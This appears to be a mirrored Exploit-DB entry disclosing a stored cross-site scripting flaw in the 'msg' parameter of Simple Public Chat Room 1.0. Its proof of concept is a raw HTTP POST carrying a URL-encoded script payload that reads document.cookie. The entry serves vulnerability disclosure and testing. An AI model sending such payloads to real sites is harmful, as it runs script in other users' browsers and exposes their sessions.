Simple Public Chat Room 1.0 - 'msg' Stored Cross-Site Scripting

vendor:

Simple Public Chat Room

by:

Richard Jones

8.8

CVSS

HIGH

Stored Cross-Site Scripting

CWE

Product Name: Simple Public Chat Room

Affected Version From: 1.0

Affected Version To: 1.0

Patch Exists: NO

Related CWE: N/A

CPE: a:sourcecodester:simple_public_chat_room:1.0

Metasploit: N/A

Other Scripts: N/A

Platforms Tested: Windows 10 Home 19041 (x64_86) + XAMPP 7.2.34

2021

Simple Public Chat Room 1.0 – ‘msg’ Stored Cross-Site Scripting

A stored cross-site scripting vulnerability exists in Simple Public Chat Room 1.0, which allows an attacker to inject malicious JavaScript code into the 'msg' parameter of the send_message.php page. This malicious code is then stored in the application and is executed when the page is loaded by other users, resulting in the execution of the malicious code in the context of the victim's browser.

Mitigation:

Input validation should be used to prevent the injection of malicious code into the application.

Source

Exploit-DB raw data:

# Exploit Title: Simple Public Chat Room 1.0 - 'msg' Stored Cross-Site Scripting
# Exploit Author: Richard Jones
# Date: 2021-01-26
# Vendor Homepage: https://www.sourcecodester.com/php/12295/simple-public-chat-room-using-php.html
# Software Link: https://www.sourcecodester.com/download-code?nid=12295&title=Simple+Public+Chat+Room+Using+PHP%2FMySQLi+with+Source+Code
# Version: 1.0
# Tested On: Windows 10 Home 19041 (x64_86) + XAMPP 7.2.34

#Replicates across chat sessions..


POST /chat/send_message.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko/20100101 Firefox/84.0
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Content-Length: 58
Origin: http://localhost
Connection: close
Cookie: PHPSESSID=r2focevhk11aqka051gt26qfhl

msg=%3Cscript%3Ealert(document.cookie)%3C%2Fscript%3E&id=1